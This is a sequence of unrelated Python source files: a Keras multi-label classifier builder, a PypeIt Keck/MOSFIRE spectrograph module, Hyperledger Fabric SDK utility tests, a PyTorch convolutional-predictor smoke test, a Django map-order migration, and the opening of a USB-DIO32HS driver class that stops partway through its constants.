    softmax output branch per label, on top of a selectable backbone network.
    """
    BACKBONE_RESNET_18 = 'resnet-18'
    BACKBONE_RESNET_18_V2 = 'resnet-18-v2'
    BACKBONE_RESNEXT_18 = 'resnext-18'
    BACKBONE_MIXNET_18 = 'mixnet-18'
    BACKBONE_MOBILENET_V2 = 'mobilenet-v2'
    # Maps the backbone name string to the class implementing it.
    BACKBONE_TYPE = {
        BACKBONE_RESNET_18: ResNet18,
        BACKBONE_RESNET_18_V2: ResNet18_v2,
        BACKBONE_RESNEXT_18: ResNeXt18,
        BACKBONE_MOBILENET_V2: MobileNetV2,
        BACKBONE_MIXNET_18: MixNet18
    }

    @classmethod
    def _multi_label_head(cls, net, output_shape, output_names):
        """
        Multi-label head: global average pooling + flatten, then one softmax
        Dense branch per label.
        :param net: backbone output feature map
        :param output_shape: number of classes for each label branch
        :param output_names: name of each label branch
        :return: list of branch output tensors
        """
        net = keras.layers.GlobalAveragePooling2D()(net)
        net = keras.layers.Flatten()(net)
        outputs = list()
        for num, name in zip(output_shape, output_names):
            output = keras.layers.Dense(units=num, kernel_initializer=keras.initializers.RandomNormal(stddev=0.01),
                                        activation="softmax", name=name)(net)
            outputs.append(output)
        return outputs

    @classmethod
    def build(cls, backbone, input_shape, output_shape, output_names):
        """
        Build the multi-label classification keras.models.Model for a backbone.
        :param backbone: backbone name, one of the BACKBONE_* constants
        :param input_shape: model input shape, must be 3-dimensional (H, W, C)
        :param output_shape: number of classes for each label branch
        :param output_names: name of each label branch
        :return: multi-label classification keras.models.Model
        """
        # (The original performed this 3-dim check twice; once suffices.)
        if len(input_shape) != 3:
            raise Exception('模型输入形状必须是3维形式')
        if backbone not in cls.BACKBONE_TYPE:
            raise ValueError("没有该类型的基础网络!")
        backbone_name = backbone
        backbone_cls = cls.BACKBONE_TYPE[backbone_name]
        logging.info('构造多标签分类模型,基础网络:%s', backbone_name)
        input_x = keras.layers.Input(shape=input_shape)
        backbone_model = backbone_cls.build(input_x)
        outputs = cls._multi_label_head(backbone_model, output_shape, output_names)
        # Keras model `name` must be a string; the original passed the backbone
        # *class object* here (the variable had been rebound above), which
        # breaks model naming. Use the original name string instead.
        model = keras.models.Model(inputs=input_x, outputs=outputs, name=backbone_name)
        return model
if __name__ == '__main__':
    # Visualize every backbone's network structure. keras.utils.plot_model
    # requires GraphViz and pydotplus (e.g. installed via conda).
    """
    可视化网络结构,使用plot_model需要先用conda安装GraphViz、pydotplus
    """
    from configs import FLAGS
    model_names = Classifier.BACKBONE_TYPE.keys()
    for model_name in model_names:
        test_model = Classifier.build(model_name, FLAGS.input_shape, FLAGS.output_shapes, FLAGS.output_names)
        keras.utils.plot_model(test_model, to_file='../images/{}.svg'.format(model_name), show_shapes=True)
        test_model.summary()
|
# (repository metadata artifact removed: gh_stars = 0)
"""
Module for Keck/MOSFIRE specific methods.
.. include:: ../include/links.rst
"""
import os
from pkg_resources import resource_filename
from IPython import embed
import numpy as np
from astropy.io import fits
from astropy.stats import sigma_clipped_stats
from pypeit import msgs
from pypeit import telescopes
from pypeit.core import framematch
from pypeit import utils
from pypeit.spectrographs import spectrograph
from pypeit.images import detector_container
from scipy import special
class KeckMOSFIRESpectrograph(spectrograph.Spectrograph):
    """
    Child to handle Keck/MOSFIRE specific code
    """
    ndet = 1
    name = 'keck_mosfire'
    telescope = telescopes.KeckTelescopePar()
    camera = 'MOSFIRE'
    supported = True
    comment = 'Gratings tested: Y, J, K'

    def get_detector_par(self, hdu, det):
        """
        Return metadata for the selected detector.

        Args:
            hdu (`astropy.io.fits.HDUList`_):
                The open fits file with the raw image of interest.
            det (:obj:`int`):
                1-indexed detector number.

        Returns:
            :class:`~pypeit.images.detector_container.DetectorContainer`:
            Object with the detector metadata.
        """
        # Detector 1
        detector_dict = dict(
            binning         = '1,1',
            det             = 1,
            dataext         = 0,
            specaxis        = 1,
            specflip        = False,
            spatflip        = False,
            platescale      = 0.1798,
            darkcurr        = 0.8,
            saturation      = 1e9,  # ADU, this is hacked for now
            nonlinear       = 1.00,  # docs say linear to 90,000 but our flats are usually higher
            numamplifiers   = 1,
            mincounts       = -1e10,
            gain            = np.atleast_1d(2.15),  # Taken from MOSFIRE detector webpage
            ronoise         = np.atleast_1d(5.8),  # This is for 16 non-destructuve reads, the default readout mode
            datasec         = np.atleast_1d('[5:2044,5:2044]'),
            #oscansec        = np.atleast_1d('[:,:]')
        )
        return detector_container.DetectorContainer(**detector_dict)

    @classmethod
    def default_pypeit_par(cls):
        """
        Return the default parameters to use for this instrument.

        Returns:
            :class:`~pypeit.par.pypeitpar.PypeItPar`: Parameters required by
            all of ``PypeIt`` methods.
        """
        par = super().default_pypeit_par()

        # Wavelengths
        # 1D wavelength solution
        par['calibrations']['wavelengths']['rms_threshold'] = 0.30  #0.20  # Might be grating dependent..
        par['calibrations']['wavelengths']['sigdetect'] = 5.0
        par['calibrations']['wavelengths']['fwhm'] = 5.0
        par['calibrations']['wavelengths']['n_final'] = 4
        par['calibrations']['wavelengths']['lamps'] = ['OH_NIRES']
        #par['calibrations']['wavelengths']['nonlinear_counts'] = self.detector[0]['nonlinear'] * self.detector[0]['saturation']
        par['calibrations']['wavelengths']['method'] = 'holy-grail'
        # Reidentification parameters
        #par['calibrations']['wavelengths']['reid_arxiv'] = 'keck_nires.fits'
        par['calibrations']['slitedges']['edge_thresh'] = 50.
        par['calibrations']['slitedges']['sync_predict'] = 'nearest'

        # Flats
        # Do not illumination correct. We should also not be flat fielding given the bars.
        # TODO Implement imaging flats for MOSFIRE. Do test with/without illumination flats.
        # Turn of illumflat
        turn_off = dict(use_biasimage=False, use_overscan=False, use_darkimage=False)
        par.reset_all_processimages_par(**turn_off)

        # Extraction
        par['reduce']['skysub']['bspline_spacing'] = 0.8
        par['reduce']['extraction']['sn_gauss'] = 4.0

        # Flexure
        par['flexure']['spec_method'] = 'skip'

        par['scienceframe']['process']['sigclip'] = 20.0
        par['scienceframe']['process']['satpix'] = 'nothing'

        # Set the default exposure time ranges for the frame typing
        par['calibrations']['standardframe']['exprng'] = [None, 20]
        par['calibrations']['arcframe']['exprng'] = [20, None]
        par['calibrations']['darkframe']['exprng'] = [20, None]
        par['scienceframe']['exprng'] = [20, None]

        # Sensitivity function parameters
        par['sensfunc']['extrap_blu'] = 0.0  # Y-band contaminated by higher order so don't extrap much
        par['sensfunc']['extrap_red'] = 0.0
        # (A second, identical `extrap_red` assignment in the original is removed.)
        par['fluxcalib']['extrap_sens'] = True
        par['sensfunc']['algorithm'] = 'IR'
        par['sensfunc']['polyorder'] = 13
        par['sensfunc']['IR']['maxiter'] = 2
        par['sensfunc']['IR']['telgridfile'] \
                = os.path.join(par['sensfunc']['IR'].default_root,
                               'TelFit_MaunaKea_3100_26100_R20000.fits')
        return par

    def init_meta(self):
        """
        Define how metadata are derived from the spectrograph files.

        That is, this associates the ``PypeIt``-specific metadata keywords
        with the instrument-specific header cards using :attr:`meta`.
        """
        self.meta = {}
        # Required (core)
        self.meta['ra'] = dict(ext=0, card='RA')
        self.meta['dec'] = dict(ext=0, card='DEC')
        self.meta['target'] = dict(ext=0, card='TARGNAME')
        self.meta['decker'] = dict(ext=0, card='MASKNAME')
        self.meta['binning'] = dict(ext=0, card=None, default='1,1')
        self.meta['mjd'] = dict(ext=0, card='MJD-OBS')
        self.meta['exptime'] = dict(ext=0, card='TRUITIME')
        self.meta['airmass'] = dict(ext=0, card='AIRMASS')
        # Extras for config and frametyping
        self.meta['dispname'] = dict(ext=0, card='OBSMODE')
        self.meta['idname'] = dict(card=None, compound=True)
        # Filter
        self.meta['filter1'] = dict(ext=0, card='FILTER')
        # Lamps
        lamp_names = ['FLATSPEC']
        for kk, lamp_name in enumerate(lamp_names):
            self.meta['lampstat{:02d}'.format(kk+1)] = dict(ext=0, card=lamp_name)
        # Dithering
        self.meta['dithpat'] = dict(ext=0, card='PATTERN')
        self.meta['dithpos'] = dict(ext=0, card='FRAMEID')
        self.meta['dithoff'] = dict(ext=0, card='YOFFSET')

    def compound_meta(self, headarr, meta_key):
        """
        Methods to generate metadata requiring interpretation of the header
        data, instead of simply reading the value of a header card.

        Args:
            headarr (:obj:`list`):
                List of `astropy.io.fits.Header`_ objects.
            meta_key (:obj:`str`):
                Metadata keyword to construct.

        Returns:
            object: Metadata value read from the header(s).
        """
        if meta_key == 'idname':
            if headarr[0].get('KOAIMTYP', None) is not None:
                return headarr[0].get('KOAIMTYP')
            else:
                try:
                    FLATSPEC = int(headarr[0].get('FLATSPEC'))
                    PWSTATA7 = int(headarr[0].get('PWSTATA7'))
                    PWSTATA8 = int(headarr[0].get('PWSTATA8'))
                    if FLATSPEC == 0 and PWSTATA7 == 0 and PWSTATA8 == 0:
                        return 'object'
                    elif FLATSPEC == 1:
                        return 'flatlamp'
                    elif PWSTATA7 == 1 or PWSTATA8 == 1:
                        return 'arclamp'
                except (TypeError, ValueError):
                    # int(None) when a card is missing -> TypeError; a
                    # non-numeric card value -> ValueError. (The original
                    # used a bare except; the in-code TODO asked for this.)
                    return 'unknown'
        else:
            msgs.error("Not ready for this compound meta")

    def configuration_keys(self):
        """
        Return the metadata keys that define a unique instrument
        configuration.

        This list is used by :class:`~pypeit.metadata.PypeItMetaData` to
        identify the unique configurations among the list of frames read
        for a given reduction.

        Returns:
            :obj:`list`: List of keywords of data pulled from file headers
            and used to constuct the :class:`~pypeit.metadata.PypeItMetaData`
            object.
        """
        return ['decker', 'dispname', 'filter1']

    def pypeit_file_keys(self):
        """
        Define the list of keys to be output into a standard ``PypeIt`` file.

        Returns:
            :obj:`list`: The list of keywords in the relevant
            :class:`~pypeit.metadata.PypeItMetaData` instance to print to the
            :ref:`pypeit_file`.
        """
        return super().pypeit_file_keys() + ['dithpat', 'dithpos', 'dithoff']

    def check_frame_type(self, ftype, fitstbl, exprng=None):
        """
        Check for frames of the provided type.

        Args:
            ftype (:obj:`str`):
                Type of frame to check. Must be a valid frame type; see
                frame-type :ref:`frame_type_defs`.
            fitstbl (`astropy.table.Table`_):
                The table with the metadata for one or more frames to check.
            exprng (:obj:`list`, optional):
                Range in the allowed exposure time for a frame of type
                ``ftype``. See
                :func:`pypeit.core.framematch.check_frame_exptime`.

        Returns:
            `numpy.ndarray`_: Boolean array with the flags selecting the
            exposures in ``fitstbl`` that are ``ftype`` type frames.
        """
        good_exp = framematch.check_frame_exptime(fitstbl['exptime'], exprng)
        if ftype in ['science', 'standard']:
            return good_exp & (fitstbl['idname'] == 'object')
        if ftype in ['bias', 'dark']:
            return good_exp & self.lamps(fitstbl, 'off') & (fitstbl['idname'] == 'dark')
        if ftype in ['pixelflat', 'trace']:
            # Flats and trace frames are typed together
            return good_exp & self.lamps(fitstbl, 'dome') & (fitstbl['idname'] == 'flatlamp')
        if ftype == 'pinhole':
            # Don't type pinhole frames
            return np.zeros(len(fitstbl), dtype=bool)
        if ftype in ['arc', 'tilt']:
            # TODO: This is a kludge. Allow science frames to also be
            # classified as arcs
            is_arc = self.lamps(fitstbl, 'arcs') & (fitstbl['idname'] == 'arclamp')
            is_obj = self.lamps(fitstbl, 'off') & (fitstbl['idname'] == 'object')
            return good_exp & (is_arc | is_obj)
        msgs.warn('Cannot determine if frames are of type {0}.'.format(ftype))
        return np.zeros(len(fitstbl), dtype=bool)

    def lamps(self, fitstbl, status):
        """
        Check the lamp status.

        Args:
            fitstbl (`astropy.table.Table`_):
                The table with the fits header meta data.
            status (:obj:`str`):
                The status to check. Can be ``'off'``, ``'arcs'``, or
                ``'dome'``.

        Returns:
            `numpy.ndarray`_: A boolean array selecting fits files that meet
            the selected lamp status.

        Raises:
            ValueError:
                Raised if the status is not one of the valid options.
        """
        if status == 'off':
            # Check if all are off
            return np.all(np.array([fitstbl[k] == 0 for k in fitstbl.keys() if 'lampstat' in k]),
                          axis=0)
        if status == 'arcs':
            # Check if any arc lamps are on
            arc_lamp_stat = ['lampstat{0:02d}'.format(i) for i in range(1, 6)]
            return np.any(np.array([fitstbl[k] == 1 for k in fitstbl.keys()
                                    if k in arc_lamp_stat]), axis=0)
        if status == 'dome':
            return fitstbl['lampstat01'] == '1'
        raise ValueError('No implementation for status = {0}'.format(status))

    def parse_dither_pattern(self, file_list, ext=None):
        """
        Parse headers from a file list to determine the dither pattern.

        Parameters
        ----------
        file_list (list of strings):
            List of files for which dither pattern is desired
        ext (int, optional):
            Extension containing the relevant header for these files. Default=None. If None, code uses
            self.primary_hdrext

        Returns
        -------
        dither_pattern, dither_id, offset_arcsec

        dither_pattern (str `numpy.ndarray`_):
            Array of dither pattern names
        dither_id (str `numpy.ndarray`_):
            Array of dither pattern IDs
        offset_arc (float `numpy.ndarray`_):
            Array of dither pattern offsets
        """
        nfiles = len(file_list)
        offset_arcsec = np.zeros(nfiles)
        dither_pattern = []
        dither_id = []
        for ifile, file in enumerate(file_list):
            hdr = fits.getheader(file, self.primary_hdrext if ext is None else ext)
            dither_pattern.append(hdr['PATTERN'])
            dither_id.append(hdr['FRAMEID'])
            offset_arcsec[ifile] = hdr['YOFFSET']
        return np.array(dither_pattern), np.array(dither_id), np.array(offset_arcsec)

    def tweak_standard(self, wave_in, counts_in, counts_ivar_in, gpm_in, meta_table, debug=False):
        """
        This routine is for performing instrument/disperser specific tweaks to standard stars so that sensitivity
        function fits will be well behaved. For example, masking second order light. For instruments that don't
        require such tweaks it will just return the inputs, but for isntruments that do this function is overloaded
        with a method that performs the tweaks.

        Parameters
        ----------
        wave_in: (float np.ndarray) shape = (nspec,)
            Input standard star wavelenghts
        counts_in: (float np.ndarray) shape = (nspec,)
            Input standard star counts
        counts_ivar_in: (float np.ndarray) shape = (nspec,)
            Input inverse variance of standard star counts
        gpm_in: (bool np.ndarray) shape = (nspec,)
            Input good pixel mask for standard
        meta_table: (astropy.table)
            Table containing meta data that is slupred from the specobjs object. See unpack_object routine in specobjs.py
            for the contents of this table.

        Returns
        -------
        wave_out: (float np.ndarray) shape = (nspec,)
            Output standard star wavelenghts
        counts_out: (float np.ndarray) shape = (nspec,)
            Output standard star counts
        counts_ivar_out: (float np.ndarray) shape = (nspec,)
            Output inverse variance of standard star counts
        gpm_out: (bool np.ndarray) shape = (nspec,)
            Output good pixel mask for standard
        """
        # Could check the wavelenghts here to do something more robust to header/meta data issues
        if 'Y-spectroscopy' in meta_table['DISPNAME']:
            # The blue edge and red edge of the detector are contaminated by
            # higher order light in Y-band; those regions are zeroed out by
            # hand below. (Earlier commented-out experiments with sigmoid
            # apodization of the flux were removed from this body.)
            wave_blue = 9520.0  # blue wavelength below which there is contamination
            wave_red = 11256.0  # red wavelength above which the spectrum is containated
            second_order_region = (wave_in < wave_blue) | (wave_in > wave_red)
            wave = wave_in.copy()
            counts = counts_in.copy()
            gpm = gpm_in.copy()
            counts_ivar = counts_ivar_in.copy()
            # By setting the wavelengths to zero, we guarantee that the sensitvity function will only be computed
            # over the valid wavelength region. While we could mask, this would still produce a wave_min and wave_max
            # for the zeropoint that includes the bad regions, and the polynomial fits will extrapolate crazily there
            wave[second_order_region] = 0.0
            counts[second_order_region] = 0.0
            counts_ivar[second_order_region] = 0.0
            gpm[second_order_region] = False
            return wave, counts, counts_ivar, gpm
        else:
            return wave_in, counts_in, counts_ivar_in, gpm_in
|
# Copyright 2009-2017 SAP SE or an SAP affiliate company.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import unittest
from hfc.fabric.client import Client
from hfc.fabric.transaction.tx_context import TXContext
from hfc.util.crypto.crypto import Ecies
from hfc.util import utils
from test.integration.utils import get_orderer_org_user
from test.integration.config import E2E_CONFIG
from hfc.protos.msp import identities_pb2
from hfc.protos.common import configtx_pb2
from hfc.protos.common import common_pb2
from google.protobuf.timestamp_pb2 import Timestamp
class UtilsTest(unittest.TestCase):
def setUp(self):
self.orderer_org_mspid = \
E2E_CONFIG['test-network']['orderer']['mspid']
self.channel_tx = \
E2E_CONFIG['test-network']['channel-artifacts']['channel.tx']
self.channel_id = \
E2E_CONFIG['test-network']['channel-artifacts']['channel_id']
self.base_path = "/tmp/fabric-sdk-py"
self.kv_store_path = os.path.join(self.base_path, "key-value-store")
def test_create_serialized_identity(self):
client = Client('test/fixtures/network.json')
orderer_org_admin = get_orderer_org_user(state_store=client.state_store
)
orderer_org_admin_serialized = utils.create_serialized_identity(
orderer_org_admin)
serialized_identity = identities_pb2.SerializedIdentity()
serialized_identity.ParseFromString(orderer_org_admin_serialized)
self.assertEqual(serialized_identity.mspid,
self.orderer_org_mspid)
def test_build_channel_header(self):
timestamp = utils.current_timestamp()
proto_channel_header = utils.build_channel_header(
common_pb2.HeaderType.Value('CONFIG_UPDATE'),
'12341234',
self.channel_id,
timestamp
)
self.assertIsInstance(proto_channel_header, common_pb2.ChannelHeader)
self.assertEqual(proto_channel_header.channel_id, self.channel_id)
def test_string_to_signature(self):
with open(self.channel_tx, 'rb') as f:
channel_tx = f.read()
channel_config = utils.extract_channel_config(channel_tx)
client = Client('test/fixtures/network.json')
orderer_org_admin = get_orderer_org_user(state_store=client.state_store
)
orderer_org_admin_tx_context = \
TXContext(orderer_org_admin, Ecies(), {})
client.tx_context = orderer_org_admin_tx_context
orderer_org_admin_signature = client.sign_channel_config(
channel_config
)
proto_signature = utils.string_to_signature(
[orderer_org_admin_signature]
)
self.assertIsInstance(proto_signature, list)
self.assertTrue(
'OrdererMSP' in proto_signature[0].signature_header.__str__())
def test_current_timestamp(self):
my_timestamp = Timestamp()
my_timestamp.GetCurrentTime()
their_timestamp = utils.current_timestamp()
self.assertEqual(my_timestamp.seconds, their_timestamp.seconds)
def test_extract_channel_config(self):
with open(self.channel_tx, 'rb') as f:
channel_tx = f.read()
config_update = configtx_pb2.ConfigUpdate()
channel_config = utils.extract_channel_config(channel_tx)
self.assertTrue(hasattr(channel_config, 'decode'))
config_update.ParseFromString(channel_config)
self.assertEqual(config_update.channel_id, self.channel_id)
def test_build_header(self):
    """build_header should wrap a channel header and identity into a Header."""
    timestamp = utils.current_timestamp()
    client = Client('test/fixtures/network.json')
    orderer_org_admin = get_orderer_org_user(state_store=client.state_store
                                             )
    orderer_org_admin_tx_context = \
        TXContext(orderer_org_admin, Ecies(), {})
    client.tx_context = orderer_org_admin_tx_context
    # Sanity: the admin identity must serialize/parse round-trip cleanly.
    orderer_org_admin_serialized = utils.create_serialized_identity(
        orderer_org_admin)
    serialized_identity = identities_pb2.SerializedIdentity()
    serialized_identity.ParseFromString(orderer_org_admin_serialized)
    proto_channel_header = utils.build_channel_header(
        common_pb2.HeaderType.Value('CONFIG_UPDATE'),
        orderer_org_admin_tx_context.tx_id,
        self.channel_id,
        timestamp
    )
    # Combine channel header, identity, and nonce into a common Header.
    channel_header = utils.build_header(
        orderer_org_admin_tx_context.identity,
        proto_channel_header,
        orderer_org_admin_tx_context.nonce
    )
    self.assertIsInstance(channel_header, common_pb2.Header)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
<reponame>deep-cube/deep-cube
from model_lcrn import LRCN
from model_seq_cnn import *
from model_conv import ConvPredictor
from tqdm import trange, tqdm
from test_dummy_data_generator import *
from model_trainer import train_model
import torch
import numpy as np
import unittest
import data_def
import metrics
class TestConvTrain(unittest.TestCase):
    """Smoke-test ConvPredictor training on synthetic single-square videos."""

    def _run_single_square_activated(
        self,
        square_persistence_length,
        use_background_noise=False,
        num_epochs=5
    ):
        # Train a small 3D-CNN predictor on the synthetic dataset and
        # print per-batch diagnostics; assertions are currently disabled.
        # B=batch, L=sequence length, C=channels, H/W=frame size.
        B, L, C, H, W = 50, 30, 3, 30, 30
        num_class = 2
        # Three 3D conv stages: (out_channels, temporal_k, spatial_k, pool).
        conv_module = SequentialCNN3D(
            C, H, W,
            [
                (16, 13, 7, True),
                (32, 13, 5, True),
                (64, 13, 3, True),
            ],
            use_batchnorm=True
        )
        hidden_sizes = [300, 100]
        model = ConvPredictor(
            conv_module,
            hidden_sizes,
            num_class,
        )
        print(model)
        train_loader = torch.utils.data.DataLoader(
            SingleSquareActivatedDataset(
                L, C, H, W,
                use_background_noise=use_background_noise,
                dataset_length=1000,
                square_persistence_length=square_persistence_length
            ),
            batch_size=B, num_workers=1,
        )
        dev_loader = torch.utils.data.DataLoader(
            SingleSquareActivatedDataset(
                L, C, H, W,
                use_background_noise=use_background_noise,
                dataset_length=200,
                square_persistence_length=square_persistence_length
            ),
            batch_size=B, num_workers=1,
        )

        def on_batch(i, x, y, scores):
            # Periodic diagnostics: predicted vs. true sequence and edit distance.
            if i % 5 == 0:
                print(y.shape)
                print(scores.shape)
                # yhat_collapsed = data_def.collapse(
                #     torch.argmax(scores[0], dim=-1).cpu().numpy())
                # y_collapsed = data_def.collapse(y[0].cpu().numpy())
                # print(yhat_collapsed)
                # print(y_collapsed)
                print(torch.argmax(scores[0], dim=-1))
                print(y[0])
                print('edit dist')
                print(metrics.sum_edit_distance(scores, y) / len(y))

        optimizer = torch.optim.Adam(model.parameters())
        results = train_model(
            model,
            train_dataloader=train_loader,
            optimizer=optimizer,
            criterion_name='cross_entropy',
            dev_dataloader=dev_loader,
            test_dataloader=dev_loader,
            num_epoch=num_epochs,
            on_batch=on_batch,
            additional_metrics={
                'edit_distance': metrics.sum_edit_distance
            }
        )
        # NOTE(review): `pprint` is not imported explicitly in this module;
        # presumably it is exported by one of the star imports above — confirm.
        pprint(results)
        # assert results['train_acc'][-1] > 0.92
        # assert results['dev_acc'][-1] > 0.92

    # def test_1_frame_without_noise(self):
    #     print('test_1_frame_without_noise')
    #     self._run_single_square_activated(1, num_epochs=5)
    # def test_3_frame_without_noise(self):
    #     print('test_3_frame_without_noise')
    #     self._run_single_square_activated(3, num_epochs=5)

    def test_1_frame_with_noise(self):
        print('test_1_frame_with_noise')
        self._run_single_square_activated(
            3, use_background_noise=True, num_epochs=5)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
# Generated by Django 2.0.13 on 2019-10-10 17:52
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
    # Auto-generated Django migration (2.0.13): adds the OrderMap model for
    # map print/order requests and widens GeneralContact.organization.
    # Avoid hand-editing the field definitions below.

    dependencies = [
        ('contact', '0016_datahuboutsideentitycontact'),
    ]

    operations = [
        # New model backing the map-order form; UUID primary key.
        migrations.CreateModel(
            name='OrderMap',
            fields=[
                ('map_order_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, verbose_name='Map Order ID')),
                ('map_option', models.CharField(blank=True, choices=[('USGS', 'USGS'), ('NWI', 'NWI'), ('FEMA', 'FEMA')], help_text='For Federal Prints only.', max_length=10, null=True, verbose_name='Map Option')),
                ('map_description', models.TextField(blank=True, help_text='List all quads/panels and specify quantity for each map. For Federal Prints only.', null=True, verbose_name='Map Description')),
                ('map_collection_name', models.CharField(blank=True, help_text='For Pre-made Maps only.', max_length=300, null=True, verbose_name='Map Collection Name')),
                ('map_sheet', models.CharField(blank=True, help_text='For Pre-made Maps only.', max_length=300, null=True, verbose_name='Map Sheet')),
                ('legislative_request', models.BooleanField(default=False, help_text='For Pre-made Maps only.', verbose_name='Legislative Request?')),
                ('map_size', models.CharField(blank=True, choices=[('8.5_by_11', '8.5_by_11'), ('11_by_17', '11_by_17'), ('24_by_24', '24_by_24'), ('24_by_28', '24_by_28'), ('30_by_30', '30_by_30'), ('36_by_36', '36_by_36'), ('60_by_60', '60_by_60'), ('custom_xlarge', 'custom_xlarge')], help_text='For Custom Maps only.', max_length=20, null=True, verbose_name='Map Size')),
                ('custom_map_size', models.CharField(blank=True, help_text='Custom sizes requests are only accepted for sizes greater than 60 x 60. For Custom Maps only.', max_length=100, null=True, verbose_name='Custom Map Size')),
                ('map_scale', models.CharField(blank=True, help_text='For Custom Maps only.', max_length=100, null=True, verbose_name='Map Scale')),
                ('map_title', models.CharField(blank=True, help_text='For Custom Maps only.', max_length=200, null=True, verbose_name='Map Title')),
                ('map_date', models.CharField(blank=True, help_text='For Custom Maps only.', max_length=100, null=True, verbose_name='Map Date')),
                ('type_of_data', models.CharField(blank=True, choices=[('N/A', 'N/A'), ('Maps', 'Maps')], default='Maps', max_length=25, null=True, verbose_name='Type of Data')),
                ('type_of_map', models.CharField(blank=True, choices=[('Federal Print', 'Federal Print'), ('Pre-Made Print', 'Pre-Made Print'), ('Custom', 'Custom')], max_length=20, null=True, verbose_name='Type of Map')),
                ('additional_info', models.TextField(blank=True, null=True, verbose_name='Additional Info')),
                ('name', models.CharField(blank=True, max_length=150, null=True, verbose_name='Name')),
                ('organization', models.CharField(blank=True, max_length=100, null=True, verbose_name='Organization')),
                ('industry', models.CharField(blank=True, max_length=50, null=True, verbose_name='Industry')),
                ('industry_other', models.CharField(blank=True, max_length=50, null=True, verbose_name='Industry (Other)')),
                ('address_1', models.CharField(blank=True, max_length=150, null=True, verbose_name='Address 1')),
                ('address_2', models.CharField(blank=True, max_length=150, null=True, verbose_name='Address 2')),
                ('city', models.CharField(blank=True, max_length=75, null=True, verbose_name='City')),
                ('state', models.CharField(blank=True, max_length=50, null=True, verbose_name='State')),
                ('zip', models.CharField(blank=True, max_length=15, null=True, verbose_name='Zip')),
                ('email', models.CharField(blank=True, max_length=150, null=True, verbose_name='Email')),
                ('phone', models.CharField(blank=True, max_length=20, null=True, verbose_name='Phone')),
                ('fax', models.CharField(blank=True, max_length=20, null=True, verbose_name='Fax')),
                ('delivery_method', models.CharField(blank=True, choices=[('Digital Download', 'Digital Download'), ('USPS', 'USPS'), ('FedEx', 'FedEx'), ('FedEx Customer Charged', 'FedEx Customer Charged')], max_length=30, null=True, verbose_name='Delivery Method')),
                ('fedex_customer_number', models.CharField(blank=True, max_length=100, null=True, verbose_name='FedEx Customer Number')),
                ('payment_method', models.CharField(blank=True, choices=[('Credit Card', 'Credit Card'), ('Check', 'Check'), ('Pay at Pickup', 'Pay at Pickup'), ('Purchase Order', 'Purchase Order')], max_length=30, null=True, verbose_name='Payment Method')),
                ('check_number', models.CharField(blank=True, max_length=60, null=True, verbose_name='Check Number')),
                ('purchase_order_number', models.CharField(blank=True, max_length=60, null=True, verbose_name='Purchase Order Number')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('last_modified', models.DateTimeField(auto_now=True, verbose_name='Last Modified')),
            ],
            options={
                'verbose_name': 'Map Order',
                'verbose_name_plural': 'Map Orders',
                'db_table': 'contact_ordermap',
            },
        ),
        migrations.AlterField(
            model_name='generalcontact',
            name='organization',
            field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Organization'),
        ),
    ]
|
#! /usr/bin/python3
#
# Copyright (c) 2020 <NAME> <<EMAIL>>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import libusb1
import usb1
import time
import sys
from struct import *
from datetime import datetime
from mccUSB import *
class usb_dio32HS(mccUSB):
    """Driver for the MCC USB-DIO32HS high-speed digital I/O device.

    Wraps libusb control/bulk transfers for the device's vendor commands:
    digital I/O, register access, input/output scans, EEPROM memory,
    miscellaneous commands, and FPGA configuration.
    """
    USB_DIO32HS_PID = 0x0133

    # Port selectors for the digital I/O commands
    PORTA = 0x0
    PORTB = 0x1
    DIO_PORTS = 0x2       # Ports A & B
    PORT0 = 0x1           # Port A for channel_map
    PORT1 = 0x2           # Port B for channel_map
    DIR_IN = 0x1
    DIR_OUT = 0x0

    # Status bit values (returned by Status())
    IN_SCAN_RUNNING = 0x2      # Input pacer running
    IN_SCAN_OVERRUN = 0x4      # Input scan overrun
    OUT_SCAN_RUNNING = 0x8     # Output scan running
    OUT_SCAN_UNDERRUN = 0x10   # Output scan underrun
    IN_SCAN_DONE = 0x20        # Input scan done
    OUT_SCAN_DONE = 0x40       # Output scan done
    FPGA_CONFIGURED = 0x100    # FPGA is configured
    FPGA_CONFIG_MODE = 0x200   # FPGA config mode

    # Scan Modes (software-side flags kept in self.mode)
    CONTINUOUS_READOUT = 0x1   # Continuous mode
    SINGLEIO = 0x2             # Return data after every read (used for low frequency scans)
    FORCE_PACKET_SIZE = 0x4    # Force packet_size

    BASE_CLOCK = 96.E6         # Base clock frequency
    MAX_PACKET_SIZE_HS = 512   # max packet size for HS device
    MAX_PACKET_SIZE_FS = 64    # max packet size for FS device

    # Commands and Codes for USB-DIO32HS
    # Digital I/O Commands
    DTRISTATE = 0x00    # Read/write digital port tristate registers
    DPORT = 0x01        # Read digital port pins
    DLATCH = 0x02       # Read/write digital port output latch register

    # Register Commands
    READ_REG = 0x10     # Read the specified register
    WRITE_REG = 0x11    # Write the specified register

    # Acquisition Commands
    IN_SCAN_START = 0x20       # Start input scan
    IN_SCAN_STOP = 0x21        # Stop input scan
    IN_SCAN_CLEAR_FIFO = 0x22  # Clear data in the input FIFO
    IN_BULK_FLUSH = 0x23       # Flush the input Bulk pipe
    OUT_SCAN_START = 0x24      # Start output scan
    OUT_SCAN_STOP = 0x25       # Stop output scan
    OUT_SCAN_CLEAR_FIFO = 0x26 # Clear data in the output FIFO

    # Memory Commands
